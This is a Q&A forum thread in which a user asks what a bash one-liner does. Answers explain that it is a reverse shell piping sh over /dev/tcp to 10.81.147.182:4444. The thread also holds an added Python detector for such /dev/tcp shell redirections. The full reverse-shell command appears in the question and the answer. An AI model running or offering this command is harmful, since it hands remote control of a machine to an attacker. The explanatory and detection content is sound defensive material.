-2

Could someone explain the following command for me please?

```bash
0<&112-;exec 112<>/dev/tcp/10.81.147.182/4444;sh <&112 >&112 2>&112
```
Walid Da.
  • I'm guessing that means to establish an ssh listener that receives input and outputs it directly to and from the tcp connection. – Neil Feb 08 '16 at 13:25
  • Yes, thanks. Do you know the exact meaning of 0<&112.. – Walid Da. Feb 08 '16 at 13:45
  • Don't miss the hyphen! `0<&112-`, that closes the file descriptor. – cdarke Feb 08 '16 at 13:50
  • I think the first part zeroes out all input so nothing will be piped into the shell to start. Searching online, I saw that this command seems to be associated with a hack that allows someone to arbitrarily create files without access. – Neil Feb 08 '16 at 13:51
  • @Neil: `man bash` gives: *`[n]<&digit- moves the file descriptor digit to file descriptor n, or the standard input (file descriptor 0) if n is not specified. digit is closed after being duplicated to n.`* – cdarke Feb 08 '16 at 13:56

1 Answer

1

See What are the uses of the exec command in shell scripts?

Abbreviations:

  • fd - file descriptor, an I/O channel identified by an integer
  • stdin - file descriptor zero, standard input, by default the terminal keyboard
  • stdout - file descriptor 1, standard output, by default the buffered terminal screen
  • stderr - file descriptor 2, standard error, by default the unbuffered terminal screen

Breaking this down:

```bash
# Move existing fd 112 to fd 0 (stdin), then close fd 112
0<&112-;

# Open fd 112 for read/write on IP address and port
exec 112<>/dev/tcp/10.81.147.182/4444;

# Run a POSIX shell (sh) taking stdin, stdout and stderr to/from fd 112
sh <&112 >&112 2>&112
```
cdarke
  • So, in other words, run a back door so whoever is on 10.81.147.182 can use (or probably even control) your system. – tripleee Feb 08 '16 at 16:35
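For defenders, the breakdown in the answer maps directly onto a detection rule: a `/dev/tcp` socket opened on a file descriptor, followed by a shell whose stdin and stdout are duplicated from that same descriptor. The following is an added example, not code from the question or the answer; the regexes, function name and sample lines are assumptions made for illustration, and it covers only the redirection pattern discussed on this page.

```python
import re

# N<>/dev/tcp/HOST/PORT : bash opens a socket on file descriptor N
SOCKET_OPEN = re.compile(
    r"(?P<fd>\d+)<>\s*/dev/(?:tcp|udp)/(?P<host>[^/\s;]+)/(?P<port>\d+)")
# A shell command plus its redirections, e.g. "sh <&112 >&112 2>&112"
SHELL_CMD = re.compile(
    r"(?:^|[;&|]\s*)(?:/\S*/)?(?:ba|da|z|k)?sh\b(?P<redirs>[^;|]*)")
# One fd duplication: "<&N", ">&N", "2>&N", "0<&N"
DUP = re.compile(r"(?P<target>\d*)(?P<op>[<>])&(?P<src>\d+)")

# Constructed sample command lines (the first is the command from the question)
SAMPLES = [
    "0<&112-;exec 112<>/dev/tcp/10.81.147.182/4444;sh <&112 >&112 2>&112",
    "exec 3<>/dev/tcp/192.0.2.10/80; echo ping >&3; cat <&3",
    "grep -r tcp /etc/services",
]


def analyze(cmdline):
    """Return a finding dict if cmdline opens /dev/tcp on an fd, else None."""
    m = SOCKET_OPEN.search(cmdline)
    if not m:
        return None
    fd = m.group("fd")
    bound = set()  # shell descriptors (0=stdin, 1=stdout, 2=stderr) tied to the socket
    for shell in SHELL_CMD.finditer(cmdline, m.end()):
        for d in DUP.finditer(shell.group("redirs")):
            if d.group("src") != fd:
                continue
            default = "0" if d.group("op") == "<" else "1"
            bound.add(int(d.group("target") or default))
    return {
        "fd": int(fd),
        "remote": f'{m.group("host")}:{m.group("port")}',
        "shell_stdio_on_socket": sorted(bound),
        # stdin and stdout both on the socket means the remote end drives the shell
        "severity": "high" if {0, 1} <= bound else "review",
    }


if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line)
```

A socket opened without a shell attached is reported as `review` rather than `high`, since scripts also use `/dev/tcp` for simple connectivity checks.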